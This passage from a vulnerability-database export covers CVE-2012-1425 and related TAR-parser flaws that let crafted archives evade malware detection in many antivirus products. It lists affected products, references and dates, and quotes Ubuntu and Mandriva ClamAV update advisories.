CVE-2012-1463\n\n--------\nCredits\n--------\nVulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov. \n\n-----------\nReferences\n-----------\n\"Abusing File Processing in Malware Detectors for Fun and Profit\" by Suman Jana and Vitaly Shmatikov\nTo appear in IEEE Symposium on Security and Privacy 2012\nhttp://www.ieee-security.org/TC/SP2012/ \n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
      ],
      trust: 2.07,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1425",
            trust: 2.9,
         },
         {
            db: "OSVDB",
            id: "80396",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80389",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80391",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80403",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80395",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80392",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80409",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
            trust: 0.8,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19226",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
            trust: 0.6,
         },
         {
            db: "BID",
            id: "52580",
            trust: 0.4,
         },
         {
            db: "VULHUB",
            id: "VHN-54706",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "110990",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   id: "VAR-201203-0385",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:12.948000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.antiy.net/en/index.html",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avira.com/ja/for-home",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.emsisoft.com/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.eset.com/us/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.fortinet.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ikarus.at/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.norman.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.pctools.com/jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.symantec.com/ja/jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/home/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.kaspersky.co.jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.mcafee.com/japan/",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80389",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80391",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80392",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80395",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80396",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80403",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80409",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1425",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1425",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19226",
         },
         {
            trust: 0.3,
            url: "http://www.antiy.net",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            trust: 0.3,
            url: "http://eset.com",
         },
         {
            trust: 0.3,
            url: "http://www.ikarus.at",
         },
         {
            trust: 0.3,
            url: "http://global.jiangmin.com/",
         },
         {
            trust: 0.3,
            url: "http://www.kaspersky.com/",
         },
         {
            trust: 0.3,
            url: "http://www.mcafee.com/",
         },
         {
            trust: 0.3,
            url: "http://anti-virus-software-review.toptenreviews.com/norman-review.html",
         },
         {
            trust: 0.3,
            url: "http://www.pctools.com/spyware-doctor-antivirus/",
         },
         {
            trust: 0.3,
            url: "http://www.quickheal.com/",
         },
         {
            trust: 0.3,
            url: "http://www.symantec.com",
         },
         {
            trust: 0.3,
            url: "http://www.trend.com",
         },
         {
            trust: 0.3,
            url: "/archive/1/522005",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1419",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1439",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1426",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1429",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1436",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1440",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1432",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1438",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1428",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1446",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1443",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1444",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1441",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1421",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1430",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1434",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1435",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1424",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1431",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1425",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1423",
         },
         {
            trust: 0.1,
            url: "http://www.ieee-security.org/tc/sp2012/",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1442",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1422",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1433",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1420",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1427",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1445",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1437",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            db: "BID",
            id: "52580",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52580",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            date: "2012-03-19T23:51:01",
            db: "PACKETSTORM",
            id: "110990",
         },
         {
            date: "2012-03-21T10:11:47.397000",
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-08-14T00:00:00",
            db: "VULHUB",
            id: "VHN-54706",
         },
         {
            date: "2012-03-30T16:10:00",
            db: "BID",
            id: "52580",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
         {
            date: "2012-08-14T03:35:49.627000",
            db: "NVD",
            id: "CVE-2012-1425",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple products  TAR Vulnerability that prevents file parsers from detecting malware",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001887",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-391",
         },
      ],
      trust: 0.6,
   },
}

var-201203-0144
Vulnerability from variot

The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR Parser If it is announced that there is also a problem with the implementation of CVE May be split.Corresponding to the length field of the full entry and part of the header of the next entry by a third party TAR Malware detection may be bypassed through archive entries. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bit2defender 7. ============================================================================ Ubuntu Security Notice USN-1482-2 June 20, 2012

clamav regression

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS
  • Ubuntu 11.10
  • Ubuntu 11.04

Summary:

ClamAV could improperly detect malware if it opened a specially crafted file.

Software Description: - clamav: Anti-virus utility for Unix

Details:

USN-1482-1 fixed vulnerabilities in ClamAV. The updated packages could fail to install in certain situations. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

It was discovered that ClamAV incorrectly handled certain malformed TAR archives. (CVE-2012-1457, CVE-2012-1459)

It was discovered that ClamAV incorrectly handled certain malformed CHM files. A remote attacker could create a specially-crafted CHM file containing malware that could escape being detected. (CVE-2012-1458)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: clamav 0.97.5+dfsg-1ubuntu0.12.04.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.2 libclamav6 0.97.5+dfsg-1ubuntu0.12.04.2

Ubuntu 11.10: clamav 0.97.5+dfsg-1ubuntu0.11.10.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.2 libclamav6 0.97.5+dfsg-1ubuntu0.11.10.2

Ubuntu 11.04: clamav 0.97.5+dfsg-1ubuntu0.11.04.2 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.2 libclamav6 0.97.5+dfsg-1ubuntu0.11.04.2

In general, a standard system update will make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-1482-2 http://www.ubuntu.com/usn/usn-1482-1 https://launchpad.net/bugs/1015337

Package Information: https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Mandriva Linux Security Advisory MDVSA-2012:094 http://www.mandriva.com/security/

Package : clamav Date : June 18, 2012 Affected: Enterprise Server 5.0

Problem Description:

This is a bugfix release that upgrades clamav to the latest version (0.97.5) that resolves the following security issues:

The TAR file parser in ClamAV 0.96.4 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459 http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5

Updated Packages:

Mandriva Enterprise Server 5: d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64: b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf OUr1QL5Wsvt3KboLKCdYUhE= =1QL7 -----END PGP SIGNATURE-----

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0144",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "virusbuster",
            scope: "eq",
            trust: 2.4,
            vendor: "virusbuster",
            version: "13.6.151.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 2.1,
            vendor: "comodo",
            version: "7424",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "authentium",
            version: "5.2.11.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "avg",
            version: "10.0.0.1190",
         },
         {
            model: "bitdefender",
            scope: "eq",
            trust: 1.8,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "clamav",
            scope: "eq",
            trust: 1.8,
            vendor: "clamav",
            version: "0.96.4",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "f-secure anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "f secure",
            version: "9.0.16160.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "sophos",
            version: "4.61.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "fortinet",
            version: "4.2.254.0",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "rising global",
            version: "22.83.00.03",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 1,
            vendor: "ahnlab",
            version: "2011.01.18.00",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "5.0.677.0",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "g data antivirus",
            scope: "eq",
            trust: 1,
            vendor: "gdata",
            version: "21",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 1,
            vendor: "microsoft",
            version: "2.0",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 1,
            vendor: "f prot",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "k7computing",
            version: "9.77.3565",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 1,
            vendor: "anti virus",
            version: "3.12.14.2",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "4.8.1351.0",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "panda antivirus",
            scope: "eq",
            trust: 1,
            vendor: "pandasecurity",
            version: "10.0.2.7",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "4.8.1351.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "5.0.677.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "rising",
            version: "22.83.00.03",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "frisk",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "g data",
            version: "21",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "k7 computing",
            version: "9.77.3565",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "panda security",
            version: "10.0.2.7",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.8,
            vendor: "virusblokada",
            version: "3.12.14.2",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 0.8,
            vendor: "unlab",
            version: "2011.01.18.00",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 0.8,
            vendor: "microsoft",
            version: "2.0 antimalware engine 1.1.6402.0",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.3,
            vendor: "virusblokada",
            version: "3.12.142",
         },
         {
            model: "linux lts i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux lts amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
